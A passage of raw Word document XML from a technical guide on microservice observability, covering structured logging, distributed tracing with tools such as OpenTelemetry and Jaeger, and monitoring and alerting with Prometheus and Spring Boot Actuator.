      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> management and </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DE4215" w14:textId="449E2BD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3016" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B5C1E" w14:textId="7E75FCE7" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00182BF2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="720" w:name="_Toc197867934"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Observability: Logging, tracing, and monitoring best practices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="720"/>
    </w:p>
    <w:p w14:paraId="655B3DB8" w14:textId="5B66FE42"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B962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best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each of these pillars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B6B78"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6B5B74">
          <v:rect id="_x0000_i3017" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176C19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Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEC14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ging provides the foundation for debugging, monitoring, and identifying anomalies in an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597AD7A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58B0075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tructured Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416A7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JSON format</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for logs instead of plain text to make parsing easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24235AA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entries should be structured so that key-value pairs (like timestamps, request IDs, error codes, etc.) can be easily extracted and indexed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5A353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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB9BE0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46BAF99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imestamp": "2025-04-19T14:32:00Z",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E06E04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evel": "INFO",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D7521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ssage": "Request received",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774588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questId": "12345",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0575F52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userId": "67890",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194AFAD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 "/api/data"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E8409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2E02BD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at Appropriate Levels</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D0C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FO</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For normal operations (e.g., service start, user requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0769C9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BUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For detailed information useful for debugging (e.g., function call entry and exit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055F79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w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For logging error events or exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1E0C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ARN</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For potential issues that aren’t critical but should be looked into.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD9F6F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Correlation IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3F0B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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlation IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., X-Request-ID) to logs for tracking a request through all the microservices it touches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619682E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is crucial in distributed systems to link logs across different services for a particular request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6628E3B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void Sensitive Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52383D4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Never log sensitive information like passwords, API keys, or user data in logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52933BA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masking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique for sensitive fields (e.g., "*****" for credit card numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75639F3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Rotation and Retention</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF503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w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log rotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid consuming excessive disk space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5714AB4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Define a retention policy to archive or delete old logs based on your needs (e.g., keeping logs for 30 days).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36616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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515861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centralized logging solution</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ELK Stack (Elasticsearch, Logstash, Kibana)</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Fluentd</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for aggregating logs from all services in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A917D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Splunk</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can also help in collecting, searching, and analyzing logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005ABEA"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A06F8C">
          <v:rect id="_x0000_i3018" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A10B0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Tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131996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istributed tracing enables you to trace the journey of a request as it travels across multiple services in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D81B8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4BA3F8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Distributed Tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C711DC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distributed tracing with tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenTelemetr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Zipkin</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Jaeger</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F9D6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ch service should generate trace IDs and propagate them with requests to downstream services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029651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very Request</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB081B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each request gets traced from the entry point (API Gateway) to the backend services. This includes any external calls (e.g., database queries or third-party APIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D3E7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ag Traces with Contextual Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03017AA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clude </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like the HTTP method, request path, user ID, and any business-related context in the trace, so that you can easily filter and analyze traces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB06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Add custom tags to the traces like "orderId", "transactionId", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D762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strument Your Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8F37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tracing libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Cloud Sleuth</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Spring Boot or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>OpenTelemetry SDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add tracing capabilities in the application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C013AA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you instrument all relevant APIs, external calls, and business logic with trace spans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06330B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sure Distributed Trace Propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5B850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trace context (like trace ID) is propagated across service boundaries using HTTP headers (e.g., X-B3-TraceId, X-Request-ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BA3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A86A1E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 xml:space="preserve"> to limit the number of traces recorded to avoid performance overhead. Only sample a fraction of requests and adjust based on traffic volume or use-cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE6F4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rror Scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FF54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errors are logged and traced correctly, including stack traces and context. This is critical for debugging complex issues in distributed systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E613E6D"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411BF">
          <v:rect id="_x0000_i3019" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A4CEE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Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A2AF7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ing focuses on collecting metrics (e.g., response times, error rates) that help you assess the health and performance of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4032349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611815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pose Application Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD42A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monitoring tool like </w:t>
      </w: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New Relic</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose application metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F4317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Spring Boot, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose useful metrics such as request count, error count, JVM stats, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A0EF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with Prometheus and Spring Boot Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD4C8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anagement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D00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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446D90B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b:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55EE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xposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D81E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nclude: "health,info,metrics"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CE51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Key Metrics to Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E68D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atency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Track response times for requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49021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 Rates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor 5xx and 4xx HTTP error codes to detect issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2A54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hroughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the number of requests per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB0B4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JVM Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Memory usage, garbage collection times, thread counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C7A0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Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure the health of your services (using endpoints like /actuator/health).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8189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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7387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Set up alerting for critical events like high error rates, high latency, or service downtime. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Alertmanager</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PagerDuty</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can send alerts via email, SMS, or Slack when thresholds are crossed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3423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tomated Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344434E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 health check endpoints like /actuator/health in Spring Boot to monitor the system’s health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF79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onfigure probes in Kubernetes for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>livenes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diness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D3660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Dependency Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
